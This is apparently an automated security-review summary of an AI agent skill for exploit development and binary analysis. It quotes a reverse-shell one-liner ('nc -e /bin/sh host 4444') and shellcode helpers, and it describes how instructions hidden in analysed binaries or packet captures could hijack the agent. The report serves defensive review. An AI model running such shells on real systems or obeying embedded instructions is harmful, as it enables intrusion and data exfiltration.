The Agent Skills Directory

[COMMAND_EXECUTION] (MEDIUM): The documentation includes instructions for spawning local processes, attaching debuggers, and generating shellcode (e.g., process('./target'), gdb.attach(p), shellcraft.sh()). These patterns are standard for security research but constitute a high-privilege execution surface if an attacker can influence the inputs to these commands.
[DATA_EXFILTRATION] (MEDIUM): The skill documents methods for creating reverse shells and network connections (e.g., remote('host', port), nc -e /bin/sh host 4444, shellcraft.connect()). If the agent handles untrusted data that gets interpolated into these command templates, it could be coerced into exfiltrating local data to a remote listener.
[INDIRECT_PROMPT_INJECTION] (MEDIUM): The skill provides tools for analyzing external files and network traffic (Ghidra, tcpdump, pwntools). This creates an attack surface (Category 8) where malicious content within a target binary or packet capture could contain instructions intended to exploit the agent's logic during analysis.
[SAFE_LISTING] (LOW): The automated scanner flagged 'libc.so' as malicious. In the context of this skill, 'libc.so' is a standard reference to the C standard library used for exploit development (Return-to-libc attacks) and is not a malicious URL or payload in itself.

tool-usage